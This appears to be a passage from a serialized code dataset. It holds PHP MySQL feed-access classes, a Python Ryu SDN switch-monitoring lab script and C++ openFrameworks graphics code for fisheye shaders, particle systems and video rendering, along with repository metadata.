$feed->id;\n $get_stmt->execute($ids);\n $get_stmt->setFetchMode(PDO::FETCH_CLASS, 'MySQLFeed', \n\t\t\t array('db'=>$this->db));\n $get_result = $get_stmt->fetchAll();\n if ($get_result === FALSE)\n throw new Exception('PDOStatement::fetchAll failed');\n\n $this->feeds = $get_result;\n }\n\n // these functions implement Iterator\n public function rewind() {\n reset($this->feeds);\n }\n public function current() {\n return current($this->feeds);\n }\n public function key() {\n return key($this->feeds);\n }\n public function next() {\n return next($this->feeds);\n }\n public function valid() {\n return ($this->current() !== FALSE);\n }\n}\n\n/* class MySQLFeed implements iFeed on MySQL databases (see corresponding \n documentation)\n*/\nclass MySQLFeed extends MySQLDBObject implements iFeed {\n private $db;\n /* $sid is the unique feed identifier which is used to access feed\n information in the database */\n public $sid;\n\n static $stories_attr = 'stories';\n\n /* function MySQLFeed::__construct is the constructor for the class\n\n $db: (MySQLDB object) a valid MySQLDB object connected to the MySQL\n database to use\n */\n public function __construct(MySQLDB $db) {\n $this->db = $db;\n }\n\n /* function MySQLFeed::__get is the PHP magic 'get' function for the class */\n public function __get($name) {\n $ret = $this->get(array($name));\n if ($ret === NULL || !isset($ret[$name]))\n return NULL;\n else\n return $ret[$name];\n }\n\n /* parseFeedInfo transforms a $feedinfo array, in the format taken by many\n iFeed functions, into an associative array with keys as database column\n names\n */\n private static function parseFeedInfo(array $feedinfo, MySQLDB $db) {\n /* $valid_feedinfo_attrs is a list of attributes from $feedinfo which can\n be handled by a simple column name transformation. Keep this list \n updated with MySQLDBObject::$feedattrs_to_cols.\n */\n static $valid_feedinfo_attrs = array('name'=>TRUE, 'url'=>TRUE);\n\n // rename the feedinfo keys as database column names\n foreach ($feedinfo as $key=>$value)\n if ($valid_feedinfo_attrs[$key] !== NULL)\n\t$db_feedinfo[self::$feedattrs_to_cols[$key]] = $value;\n\n return $db_feedinfo;\n }\n\n/* MySQLFeed::find implements iFeed::find (see corresponding documentation)\n*/\n public static function find($attr, $value, iDatabase $db = NULL) {\n if ($db === NULL)\n $db = self::$site_db;\n return self::__find($attr, $value, $db);\n }\n\n /* MySQLFeed::__find is a helper function to MySQLFeed::find which performs\n the actual find operation. This function was added in order to use\n typehinting on parameter $db.\n */\n private static function __find($attr, $value, MySQLDB $db) {\n /* $valid_find_feedattrs is a list of attributes from $feedinfo which can\n be used as input to this function. Keep this list updated with\n MySQLDBObject::$feedattrs_to_cols.\n */\n static $valid_find_feedattrs = \n array('id'=>TRUE, 'sid'=>TRUE, 'name'=>TRUE, 'url'=>TRUE);\n\n if (isset($valid_find_feedattrs[$attr]))\n $db_attr = self::$feedattrs_to_cols[$attr];\n else\n throw new InvalidArgumentException('parameter $attr is not a valid '.\n\t\t\t\t\t 'attribute');\n\n $find_sql = \"SELECT sid FROM feed_sources WHERE $db_attr=:value;\";\n $find_stmt = $db->pdo->prepare($find_sql);\n $find_stmt->bindParam(':value', $value);\n $find_stmt->execute();\n // set fetch mode to create an instance of this class\n $find_stmt->setFetchMode(PDO::FETCH_CLASS, __CLASS__, array('db'=>$db));\n $find_result = $find_stmt->fetch();\n return $find_result !== FALSE ? $find_result : NULL;\n }\n\n\n/* MySQLFeed::create implements iFeed::create (see corresponding documentation)\n*/\n public static function create(array $feedinfo, iDatabase $db = NULL) {\n if ($db === NULL)\n $db = self::$site_db;\n return self::__create($feedinfo, $db);\n }\n\n /* MySQLFeed::__create is a helper function to MySQLFeed::create which\n performs the actual create operation. This function was added in order to\n use typehinting on parameter $db.\n */\n public static function __create(array $feedinfo, MySQLDB $db) {\n // parse $feedinfo into a format able to be fed straight into database\n $db_feedinfo = self::parseFeedInfo($feedinfo, $db);\n \n // build the SQL query to use to replace the feed\n $create_sql = 'INSERT IGNORE INTO feed_sources (';\n // add column names\n foreach ($db_feedinfo as $col=>$value)\n $create_sql .= $col.', ';\n // remove trailing comma and space\n $create_sql = substr($create_sql, 0, -2);\n // add column values\n $create_sql .= ') VALUES (';\n foreach ($db_feedinfo as $col=>$value)\n $create_sql .= ':'.$col.', ';\n // remove trailing comma and space\n $create_sql = substr($create_sql, 0, -2);\n $create_sql .= ');';\n \n // prepare the SQL statement\n $create_stmt = $db->pdo->prepare($create_sql);\n \n // bind column values\n foreach ($db_feedinfo as $col=>$value)\n $create_stmt->bindValue(':'.$col, $value);\n \n // execute the SQL statement\n $create_stmt->execute();\n\n return MySQLFeed::find('url', $feedinfo['url'], $db);\n }\n\n /* MySQLFeed::getStories is a written as a helper function to MySQLFeed::get\n which carries out the operation of getting a feed's stories\n\n returns a MySQLStories object representing the set of the feed's stories\n */\n private function getStories() {\n static $stories_sql = 'SELECT fid FROM feed_stories WHERE sid=:sid;';\n $stories_stmt = $this->db->pdo->prepare($stories_sql);\n $stories_stmt->bindParam(':sid', $this->sid);\n $stories_stmt->execute();\n /* XXX creating the objects this way relies on DB consistency (sid is not\n checked to be existent in feed_sources table) */\n $stories_stmt->setFetchMode(PDO::FETCH_CLASS, 'MySQLStory', \n\t\t\t array('db'=>$this->db));\n $stories_result = $stories_stmt->fetchAll();\n return new MySQLStories($stories_result, $this->db);\n }\n\n/* MySQLFeed::get implements iFeed::get (see corresponding documentation)\n*/\n public function get(array $feedattrs) {\n /* $valid_feedattrs is a list of attributes from $feedattrs which can be\n handled by the simple sql query generator below. Keep this list updated\n with MySQLDBObject::$feedattrs_to_cols.\n */\n static $valid_feedattrs = array('name'=>TRUE, 'url'=>TRUE);\n\n $sql_added = FALSE;\n $get_result = array();\n\n // build SQL query to use to get feed attributes\n $get_sql = 'SELECT ';\n // add column names\n foreach ($feedattrs as $key=>$attr) {\n if (isset($valid_feedattrs[$attr])) {\n\t$get_sql .= self::$feedattrs_to_cols[$attr].\" AS $attr, \";\n\t$sql_added = TRUE;\n }\n }\n // remove trailing comma and space\n $get_sql = substr($get_sql, 0, -2);\n // add rest of SQL query\n $get_sql .= ' FROM feed_sources WHERE sid=:sid;';\n\n // do not attempt the SELECT if no attrs were added to the select\n if ($sql_added === TRUE) {\n $get_stmt = $this->db->pdo->prepare($get_sql);\n $get_stmt->bindParam(':sid', $this->sid);\n\n $get_stmt->execute();\n $get_result = $get_stmt->fetch(PDO::FETCH_ASSOC);\n if ($get_result === FALSE)\n\tthrow new Exception('PDOStatement::fetch failed');\n }\n\n // get id if requested\n if (in_array('id', $feedattrs))\n $get_result['id'] = $this->sid;\n if (in_array('sid', $feedattrs))\n $get_result['sid'] = $this->sid;\n\n // get stories if requested\n if (in_array(self::$stories_attr, $feedattrs))\n $get_result[self::$stories_attr] = $this->getStories();\n\n return $get_result;\n }\n\n/* MySQLFeed::delete implements iFeed::delete (see corresponding documentation)\n*/\n public function delete() {\n // build the SQL query to use to delete the feed\n static $delete_sql = 'DELETE FROM feed_sources WHERE sid=:sid;';\n // prepare the SQL statement\n $delete_stmt = $this->db->pdo->prepare($delete_sql);\n // bind column values\n $delete_stmt->bindValue(':sid', $this->sid);\n // execute the SQL statement\n $delete_stmt->execute();\n\n /* unset $this->uid so that future operations on this MySQLUser object\n will fail */\n unset ($this->uid);\n }\n\n/* MySQLFeed::getUserCount implements iFeed::getUserCount (see corresponding \n documentation)\n*/\n public function getUserCount() {\n static $usercount_sql = 'SELECT COUNT(uid) FROM favorites WHERE sid=:sid;';\n $usercount_stmt = $this->db->pdo->prepare($usercount_sql);\n $usercount_stmt->bindParam(':sid', $this->sid);\n $usercount_stmt->execute();\n return $usercount_stmt->fetchColumn();\n }\n}\n" } ]
38
hammertux/ip-2019
https://github.com/hammertux/ip-2019
ebf5bf8a1d6e8f4f4fb6d7cbe438c033908f3225
030a95ffff57ddc12560afe8b452e69a9d9fa29a
57b5578e34eb7554426d40405b78d3965d3a43b7
refs/heads/master
2022-03-29T16:17:09.255821
2019-11-25T15:59:54
2019-11-25T15:59:54
221,927,358
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6502525210380554, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 28.700000762939453, "blob_id": "64f711beca71bcb6e41949f77055ee97177ec699", "content_id": "91de1a7a2d8af6a2ed8de0bceac2ac9230920e1c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2376, "license_type": "no_license", "max_line_length": 88, "num_lines": 80, "path": "/lab1/lab1/switch_monitor.py", "repo_name": "hammertux/ip-2019", "src_encoding": "UTF-8", "text": "from operator import attrgetter\n\nfrom ryu.controller import ofp_event\nfrom ryu.controller.handler import MAIN_DISPATCHER, DEAD_DISPATCHER\nfrom ryu.controller.handler import set_ev_cls\nfrom ryu.lib import hub\n\n# This is the learning switch you have already created\n# Now you extend the learning switch with monitoring capability\nfrom learning_switch import LearningSwitch13\n\n\n# The switch monitor function extends the learning switch\nclass SwitchMonitor13(LearningSwitch13):\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper(SwitchMonitor13, self).__init__(*args, **kwargs)\n\n\t\tself.datapaths = {}\n\n\t\tself.monitor_thread = hub.spawn(self._monitor)\n\n\t@set_ev_cls(ofp_event.EventOFPStateChange, [MAIN_DISPATCHER, DEAD_DISPATCHER])\n\tdef _state_change_handler(self, ev):\n\t\tdatapath = ev.datapath\n\t\tstate = ev.state\n\n\t\tif state == MAIN_DISPATCHER:\n\t\t\tif datapath.id not in self.datapaths:\n\t\t\t\tself.datapaths[datapath.id] = datapath\n\t\telse:\n\t\t\tif datapath.id == DEAD_DISPATCHER:\n\t\t\t\tdel self.datapaths[datapath.id]\n\n\tdef _monitor(self):\n\n\t\twhile True:\n\t\t\tfor dp in self.datapaths.values():\n\t\t\t\tself._request_stats(dp)\n\t\t\thub.sleep(5)\n\n\tdef _request_stats(self, datapath):\n\t\tself.logger.debug('send stats request: %016x', datapath.id)\n\t\tofproto = datapath.ofproto\n\t\tparser = datapath.ofproto_parser\n\n\t\trequest = parser.OFPFlowStatsRequest(datapath)\n\t\tdatapath.send_msg(request)\n\n\t\t# Handle flow stats information from the datapaht\n\t@set_ev_cls(ofp_event.EventOFPFlowStatsReply, MAIN_DISPATCHER)\n\tdef _flow_stats_reply_handler(self, ev):\n\n\t\tbody = ev.msg.body\n\t\tdpid = ev.msg.datapath.id\n\n\t\tcounters1 = []\n\t\tcounters2 = []\n\n\t\t# need to monitor datapath 1 and datapath 2\n\t\tfor flow in body:\n\t\t\t\tmatch = flow.match\n\t\t\t\tif flow.priority != 0 and (match['in_port'] == 1 and dpid == 1):\n\t\t\t\t\tcounters1.append(flow.packet_count)\n\t\t\t\tif flow.priority != 0 and (dpid == 2 and flow.instructions[0].actions[0].port == 3):\n\t\t\t\t\tcounters2.append(flow.packet_count)\n\n\n\t\tsum = 0\n\t\tif dpid == 1:\n\t\t\tfor i in range(0, len(counters1)):\n\t\t\t\tsum = sum + counters1[i]\n\t\t\tprint(\"-------- -------- -------- -------- \")\n\t\t\tprint(\"incoming from h1 on switch s1 = \" + str(sum))\n\n\n\t\tif dpid == 2:\n for i in range(0, len(counters2)):\n sum = sum + counters2[i]\n\t\t\tprint(\"outgoing to h3 on switch s2 = \" + str(sum))\n\t\t\tprint(\"-------- -------- -------- -------- \")\n" } ]
1
Opensemble/lhcvmm
https://github.com/Opensemble/lhcvmm
0b57b0ddb30abc1e3aef123208c1e53bbe673935
355f2523ba0f7530bf6c41b8ab35e520233eb6dd
fe9667bbfa7d642f023d8b09be2ec4a3816039c0
refs/heads/master
2020-04-15T15:21:30.190247
2016-09-08T14:16:45
2016-09-08T14:16:45
46,009,373
7
4
null
2015-11-11T20:56:54
2015-12-14T18:02:21
2015-12-14T18:40:27
null
[ { "alpha_fraction": 0.4863192141056061, "alphanum_fraction": 0.4970684051513672, "avg_line_length": 24.558332443237305, "blob_id": "83fe81fef070291c16675142a7063d5597f514fa", "content_id": "1802e1bc9e2d6224be445de6686d91e854b43184", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3070, "license_type": "no_license", "max_line_length": 98, "num_lines": 120, "path": "/Graphics/addons/ofxFisheye/src/ofxFisheye.cpp", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "\n#include \"ofxFisheye.h\"\n\nvoid ofxFisheye::setup(fxType type = tVariableFisheye){\n \n \n //load shaders------------\n #ifdef TARGET_OPENGLES\n ofLogError(\"NOT AVAILABLE SHADERS FOR THIS RENDERER\");\n #else\n if(ofIsGLProgrammableRenderer()){\n ofLogError(\"NOT AVAILABLE SHADERS FOR THIS RENDERER\");\n }else{\n \n fixFishShader.setupShaderFromSource(GL_FRAGMENT_SHADER, fixFisheye.gl2FragmentShader);\n fixFishShader.bindDefaults();\n fixFishShader.linkProgram();\n \n barrelShader.setupShaderFromSource(GL_FRAGMENT_SHADER, barrelDist.gl2FragmentShader);\n barrelShader.bindDefaults();\n barrelShader.linkProgram();\n \n varFishShader.setupShaderFromSource(GL_FRAGMENT_SHADER, varFisheye.gl2FragmentShader);\n varFishShader.bindDefaults();\n varFishShader.linkProgram();\n \n ofLogNotice(\"ofxFisheye: Shaders loaded.\");\n }\n #endif\n //------------------------\n setFxType(type);\n \n}\n//---------------------------------\nvoid ofxFisheye::update(){\n\n}\n//---------------------------------\nvoid ofxFisheye::draw(){\n\n}\n//--------------------------------\nvoid ofxFisheye::exit(){\n\n}\n//---------------------------------\nvoid ofxFisheye::begin(ofTexture& fboTexture, int w, int h, float amount){\n \n float amnt = ofClamp(amount, 0.0, 1.0);;\n \n switch (currentFxType) {\n case tFixFisheye:\n amnt *= 180;//0 a 180\n break;\n case tBarrelDist:\n amnt *= 4.0;//0 a 2\n break;\n case tVariableFisheye:\n amnt = amnt*2 - 1.0;// (-1,1)\n amnt*=0.5;//(-0.5,0.5)\n break;\n \n default:\n break;\n }\n \n \n currentShader->begin();\n currentShader->setUniformTexture(\"tex\", fboTexture, 0);\n currentShader->setUniform1f(\"width\", w);\n currentShader->setUniform1f(\"height\", h);\n currentShader->setUniform1f(\"amount\", amnt);\n}\n//---------------------------------\nvoid ofxFisheye::end(){\n currentShader->end();\n}\n//---------------------------------\nvoid ofxFisheye::setFxType(fxType type){\n \n currentFxType = type;\n \n switch (currentFxType) {\n \n case tFixFisheye:\n currentShader = &fixFishShader;\n break;\n case tBarrelDist:\n currentShader = &barrelShader;\n break;\n case tVariableFisheye:\n currentShader = &varFishShader;\n break;\n \n default:\n break;\n }\n \n}\n//---------------------------------\nstring ofxFisheye::getFxTypeAsString(){\n \n string s;\n \n switch (currentFxType) {\n case tFixFisheye:\n s = \"FIX Fisheye\";\n break;\n case tVariableFisheye:\n s = \"VARIABLE Fisheye\";\n break;\n case tBarrelDist:\n s = \"Barrel Distortion\";\n break;\n \n default:\n break;\n }\n \n return s;\n}\n\n\n" }, { "alpha_fraction": 0.6128625273704529, "alphanum_fraction": 0.6216897964477539, "avg_line_length": 18.580245971679688, "blob_id": "22adfa5a8520ced72b08a6fa7bb1ab3fe2c873a2", "content_id": "a3e25a636546a268e2e51b1cd0cacde083d0eb1d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1586, "license_type": "no_license", "max_line_length": 80, "num_lines": 81, "path": "/Graphics/apps/videoTest_3/src/particleSystem/ParticleSystemPair.h", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "\n#pragma once\n\n#include \"ofMain.h\"\n\n#include \"ParticleGroupSystem.h\"\n\n\nenum PairType{\n IN,\n OUT\n};\n\nclass ParticleSystemPair{\n \npublic:\n \n void setup(int x, int y, int w, int h, PairType type);\n void update(std::map<string, float>& data1, std::map<string, float>& data2);\n void drawScene();\n \n void reset(int x, int y, int w, int h);\n \n void checkAndDrawGroupUnions();\n \n void drawSolidMesh(ParticleGroup *group1, ParticleGroup *group2);\n void drawLineStructure(ParticleGroup *group1, ParticleGroup *group2);\n \n void addPartGroup(int ch);\n \n \n \n void setDistanceTreshold(float tresh){_distanceTreshold = tresh;}\n void setGroupPartsNum(int num){_groupPartsNum = num;}\n void setIsContinuum(bool state, float rate_ms = 500.0);\n void setDoRandom(bool state){\n _bDoRandom = state;\n system_1.setDoAddRandom(state);\n system_2.setDoAddRandom(state);\n }\n \n void setColor(ofColor col);\n \n bool getIsContinuum(){return _bIsContinuum;}\n bool getIsDoingRandom(){return _bDoRandom;}\n int getPartsNum();\n \n ParticleGroupSystem system_1, system_2;\n \n int _x, _y;\n int _w, _h;\n\nprivate:\n //parameters\n float _distanceTreshold;\n int _groupPartsNum;\n \n PairType _type;\n \n ofShader lineShader;\n ofShader phongShader;\n \n bool _bIsContinuum;\n float continuumTimer;\n float lastTimer;\n float _continuum_rate_ms;\n float _bDoRandom;\n \n ofMaterial material;\n \n ofColor _mainColor;\n \n \n \n \n \n \n \n \n \n\n};" }, { "alpha_fraction": 0.6501364707946777, "alphanum_fraction": 0.658325731754303, "avg_line_length": 26.148147583007812, "blob_id": "7a10353aeaea8ad60cb7d36a5279f074412ac678", "content_id": "389ee5a325fa7275a16368866ee7ca0caf693d1f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2198, "license_type": "no_license", "max_line_length": 163, "num_lines": 81, "path": "/Graphics/apps/videoTest_3/src/VideoRenderer.h", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "/*\n * VideoRenderer.h\n * Renderer de contexto openGL a \"Secuencia PNG\" o Archivo de video\n * Creado utilizando el addon ofxVideoRecorder(https://github.com/timscaffidi/ofxVideoRecorder)\n * Y el ejemplo de openFrameworks threadedPixelBufferExample (https://github.com/openframeworks/openFrameworks/tree/master/examples/gl/threadedPixelBufferExample)\n */\n\n#pragma once\n\n#include \"ofMain.h\"\n#include \"ofxVideoRecorder.h\"\n#include \"ImageSaverThread.h\"\n\nenum RecordingMode{\n PNG_SEQUENCE,\n MOV_FILE\n};\n\nenum Resolution{\n r256,\n r512,\n r1024,\n r2048,\n r4096\n};\n\nclass VideoRenderer{\n\n public:\n \n void setup(int iFramerate, RecordingMode initMode, Resolution initRes);\n void update();\n void draw(int x, int y, int w, int h);\n void exit();\n \n void recordingComplete(ofxVideoRecorderOutputFileCompleteEventArgs& args);\n \n \n void startRecording();\n void stopRecording();\n \n void setOutputResolution(Resolution res);\n void setRecordingMode(RecordingMode mode){currentRecMode = mode;}\n \n \n ofFbo* getFbo(){return &fbo;}\n int getFboWidth(){return fbo.getWidth();}\n int getFboHeight(){return fbo.getHeight();}\n bool getIsRecording(){return bIsRecording;}\n RecordingMode getRecordingMode(){return currentRecMode;}\n Resolution getOutputResolution(){return currentOutResolution;}\n string getRecordingModeAsString();\n string getResolutionAsString();\n \n int getLastFrameMarker(){return saverThread.getlastFrameMarker();}\n \n private:\n \n bool bIsRecording;\n RecordingMode currentRecMode;\n Resolution currentOutResolution;\n int framerate;\n \n ofFbo fbo;\n ofPixels pixels;\n \n //pngSequence-Saver objects and variables\n ofBufferObject pixelBufferBack, pixelBufferFront;\n bool pngFirstFrame;\n ImageSaverThread saverThread;\n \n //MovFile Recorder objects and variables\n ofxVideoRecorder vidRecorder;\n ofFbo recordFbo;\n ofPixels recordPixels;\n string fileName;\n string fileExt;\n \n\n\n};" }, { "alpha_fraction": 0.6015936136245728, "alphanum_fraction": 0.6274900436401367, "avg_line_length": 22.904762268066406, "blob_id": "6cdd8346b99d8f245b7bc77566fce9ca0b99955b", "content_id": "3610af317008857e063c35c4eef16727abe0f162", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3012, "license_type": "permissive", "max_line_length": 65, "num_lines": 126, "path": "/Graphics/addons/ofxDomemaster/src/ofxDomemaster.cpp", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "#include \"ofxDomemaster.h\"\n\nofxDomemaster::ofxDomemaster(){\n meshScaleExt = 1;\n}\n\nvoid ofxDomemaster::setup(){\n width = 1024;\n height = 1024;\n\n for (int i=0; i<renderCount; i++){\n ofCamera c;\n c.setNearClip(.01);\n renderCamera.push_back(c);\n ofFbo f;\n renderFbo.push_back(f);\n ofVboMesh m;\n renderMesh.push_back(m);\n }\n\n resize(width, height);\n\n renderMesh[bottom].load(\"domemaster/bottom.ply\");\n renderMesh[front].load(\"domemaster/front.ply\");\n renderMesh[left].load(\"domemaster/left.ply\");\n renderMesh[right].load(\"domemaster/right.ply\");\n renderMesh[top].load(\"domemaster/top.ply\");\n\n // cube camera\n renderCamera[bottom].setOrientation(ofVec3f(-90,0,0));\n renderCamera[bottom].setFov(90);\n \n renderCamera[front].setOrientation(ofVec3f(0,0,0));\n renderCamera[front].setFov(90);\n \n renderCamera[left].setOrientation(ofVec3f(0,90,0));\n renderCamera[left].setFov(90);\n \n renderCamera[right].setOrientation(ofVec3f(0,-90,0));\n renderCamera[right].setFov(90);\n \n renderCamera[top].setOrientation(ofVec3f(90,0,0));\n renderCamera[top].setFov(90);\n\n \n // mask\n mask.load(\"domemaster/mask.png\");\n mask.setUseTexture(true);\n \n fisheyeCamera.enableOrtho();\n fisheyeCamera.setPosition(0, 0, 10);\n //fisheyeCamera.setPosition(-width/2, -height/2, 10);\n meshScale = width*meshScaleExt;\n \n}\n\nvoid ofxDomemaster::begin(int i){\n renderFbo[i].begin();\n ofClear(0);\n renderCamera[i].begin(view);\n}\n\nvoid ofxDomemaster::end(int i){\n renderFbo[i].end();\n renderCamera[i].end();\n}\n\nvoid ofxDomemaster::draw(){\n \n fisheyeCamera.begin(fisheyeView);\n ofEnableNormalizedTexCoords();\n\n for (int i=0; i<renderCount; i++){\n renderFbo[i].getTexture().bind();\n ofPushMatrix();\n ofRotate(90,1,0,0);\n ofRotate(180,0,0,1);\n ofRotate(180,0,1,0);\n ofScale(meshScale, meshScale, meshScale);\n renderMesh[i].drawFaces();\n ofPopMatrix();\n renderFbo[i].getTexture().unbind();\n }\n\n ofDisableNormalizedTexCoords();\n fisheyeCamera.end();\n fisheyeCamera.draw();\n}\n\nvoid ofxDomemaster::drawMask(){\n mask.draw(0, 0, width, height);\n}\n\nvoid ofxDomemaster::resize(int w, int h){\n width = w;\n height = h;\n\n // set view for cube cameras\n view.setWidth(width);\n view.setHeight(height);\n\n\n // cube camera fbos\n for (int i=0; i<renderCount; i++){\n //renderFbo[i].setUseTexture(true);\n renderFbo[i].allocate(width, height);\n renderFbo[i].begin();\n ofClear(0);\n renderFbo[i].end();\n }\n\n // fisheye domemaster\n fisheyeView.setWidth(width);\n fisheyeView.setHeight(height);\n}\n\nvoid ofxDomemaster::setCameraPosition(float x, float y, float z){\n for (int i=0; i<renderCount; i++){\n renderCamera[i].setPosition(x,y,z);\n }\n}\n\nvoid ofxDomemaster::setMeshScale(float s){\n meshScaleExt = s;\n meshScale = width*meshScaleExt;\n}\n" }, { "alpha_fraction": 0.6634400486946106, "alphanum_fraction": 0.6701414585113525, "avg_line_length": 24.339622497558594, "blob_id": "0bb03ce34473374e7a114e14b86295a46c0fa510", "content_id": "3f5a2dc960f982bedeeefa863c8379ab51532878", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1343, "license_type": "no_license", "max_line_length": 107, "num_lines": 53, "path": "/Graphics/apps/videoTest_BA_Planetarium/src/ofApp.h", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "#pragma once\n\n#include \"ofMain.h\"\n#include \"ofxFisheye.h\"\n#include \"VideoRenderer.h\"\n\n#define FRAME_RATE 30\n#define DURATION 15.0\n\nclass ofApp : public ofBaseApp{\n\n\tpublic:\n\t\tvoid setup();\n\t\tvoid update();\n\t\tvoid draw();\n void exit();\n\n\t\tvoid keyPressed(int key);\n\t\tvoid keyReleased(int key);\n\t\tvoid mouseMoved(int x, int y );\n\t\tvoid mouseDragged(int x, int y, int button);\n\t\tvoid mousePressed(int x, int y, int button);\n\t\tvoid mouseReleased(int x, int y, int button);\n\t\tvoid mouseEntered(int x, int y);\n\t\tvoid mouseExited(int x, int y);\n\t\tvoid windowResized(int w, int h);\n\t\tvoid dragEvent(ofDragInfo dragInfo);\n\t\tvoid gotMessage(ofMessage msg);\n\n void drawScene(int w, int h);\n\n void startAnimation();\n void stopAnimation();\n\n //animation data variables----------------\n bool isAnimating;\n int frameCounter;//animation Frame Counter\n float frameDuration;//Duration in seconds of each frame\n int framesMaxNumber;//Number of frames of the entire animation\n float animValue;//Current frame in relationship with the duration of the entire animation (0.0 - 1.0)\n float animationTime;\n\n //----------------------------\n ofxFisheye fisheye;\n float fisheyeAmount;\n\n VideoRenderer renderer;\n\n ofFbo drawFbo; //FBO for drawing scene, wihtout fisheye\n\n ofTrueTypeFont\tverdana;\n\n};\n" }, { "alpha_fraction": 0.47596532106399536, "alphanum_fraction": 0.48857367038726807, "avg_line_length": 18.796875, "blob_id": "908f0ccc273241e2a19150ec17fb6d36a4882b35", "content_id": "88d17f5717e5337fdebdfd81acb4a71246323fd1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1269, "license_type": "no_license", "max_line_length": 91, "num_lines": 64, "path": "/Graphics/apps/videoTest_3/src/particleSystem/ParticleGroupSystem.cpp", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "\n#include \"ParticleGroupSystem.h\"\n\nvoid ParticleGroupSystem::setup(int x, int y, int w, int h, int dir){\n \n _x = x;\n _y = y;\n _w = w;\n _h = h;\n _dir = dir;\n \n \n if(dir>0)\n bounds_h.set(_x, _w);\n else if(dir<0)\n bounds_h.set(_x-_w, _x);\n \n _minRadius = 30.0;\n _maxRadius = 90.0;\n \n \n}\n//----------------------------------\nvoid ParticleGroupSystem::update(std::map<string, float>& data){\n \n radiusInit= data.at(KEY_RADIUS_INIT);\n angleInit = data.at(KEY_ANGLE_INIT);\n \n for(int i=0; i<partGroups.size(); i++){\n \n partGroups[i]->update(data);\n \n //!!!z-limit\n if(partGroups[i]->isOutOfBounds(-3000, 100)){\n partGroups.erase(partGroups.begin()+i);\n }\n }\n \n\n\n}\n//---------------------------------\nvoid ParticleGroupSystem::drawParticles(){\n\n for (auto p : partGroups){\n p->draw();\n }\n \n\n \n}\n//--------------------------------\nvoid ParticleGroupSystem::addParticlesGroup(int groupPartsNum){\n \n int this_y;\n \n if(bDoAddRandom) this_y = ofRandom(_h);\n else this_y = _y;\n \n \n auto p = new ParticleGroup(groupPartsNum, _x, this_y, _w, _dir, radiusInit, angleInit);\n partGroups.push_back(p);\n\n \n}\n\n" }, { "alpha_fraction": 0.804347813129425, "alphanum_fraction": 0.804347813129425, "avg_line_length": 44.5, "blob_id": "c6b983c2a296076c0acd3bc54b5edc84a997c730", "content_id": "58625928f792aee750736407d5598b9b5e8ff5cb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 92, "license_type": "no_license", "max_line_length": 78, "num_lines": 2, "path": "/Graphics/addons/ofxFisheye/README.md", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "#ofxFisheye\n###Addon for applying Fisheye and Barrel Distortion filters with GLSL Shaders. \n" }, { "alpha_fraction": 0.7744107842445374, "alphanum_fraction": 0.7811447978019714, "avg_line_length": 28.700000762939453, "blob_id": "66f1733a96191699b9c42c40f08a8d980c797fcf", "content_id": "d74ad10290bbd83978fa873fe25718f0922ebdc3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 297, "license_type": "no_license", "max_line_length": 229, "num_lines": 10, "path": "/Graphics/examples/emptyExample/README.md", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "#emptyExample\t\n\n###Description\n\n\n###Dependencies\n\n\n### Compilation\nThe Graphics Engine of the LHCVMM is developed using openFrameworks v0.9 (www.openFrameworks.com). To compile the examples in this repository you need to clone lhcvmm main directory into OF root dir (OF_ROOT_DIR/lhcvmm/Graphics/)\n" }, { "alpha_fraction": 0.5, "alphanum_fraction": 0.551581859588623, "avg_line_length": 25.66972541809082, "blob_id": "9061ee6fa8ca31891cd4e084846fa33a237e8c50", "content_id": "7ffe0353ac8b52bb12d637f82e99b5d433b6a37c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2908, "license_type": "no_license", "max_line_length": 131, "num_lines": 109, "path": "/Graphics/apps/final/src/SphereManager.cpp", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "\n#include \"SphereManager.h\"\n\nvoid SphereManager::setup(){\n \n displacement.setup();\n dispResolution = 96;\n \n faceShader.setGeometryInputType(GL_TRIANGLE_STRIP);\n faceShader.setGeometryOutputType(GL_TRIANGLE_STRIP);\n faceShader.setGeometryOutputCount(3);\n faceShader.load(\"entropica/shaders/faces/vert.glsl\", \"entropica/shaders/faces/frag.glsl\", \"entropica/shaders/faces/geom.glsl\");\n \n phongShader.load(\"entropica/shaders/phong/phong.vert\",\"entropica/shaders/phong/phong.frag\" );\n \n //--------------\n _mainColor = ofColor::white;\n material.setShininess(110.0);\n material.setDiffuseColor(_mainColor);\n \n setupGui();\n \n\n}\n//----------------------------------\nvoid SphereManager::update(){\n \n //---------------------------------\n float x, y, vol, rad, res, vel;\n \n float centroid = 0.5;\n float specComp = 0.5;\n \n x = centroid*.1;\n y = .001 + specComp*.049;\n vol = 0.5+centroid*0.1;\n rad = 30+specComp*100;\n res = dispResolution;\n vel = 1;\n \n dispNzAmnt =strengthGui;\n \n displacement.update(xGui, yGui, volumeGui, radiusGui, resolGui, ofGetFrameNum()*velGui);\n\n\n}\n//----------------------------------\nvoid SphereManager::drawScene(){\n \n material.begin();\n \n if (bDoFaceSh) {\n faceShader.begin();\n faceShader.setUniform1f(\"timeVal\", ofGetFrameNum());\n faceShader.setUniform1f(\"noiseAmnt\", dispNzAmnt);\n }else{\n phongShader.begin();\n }\n \n 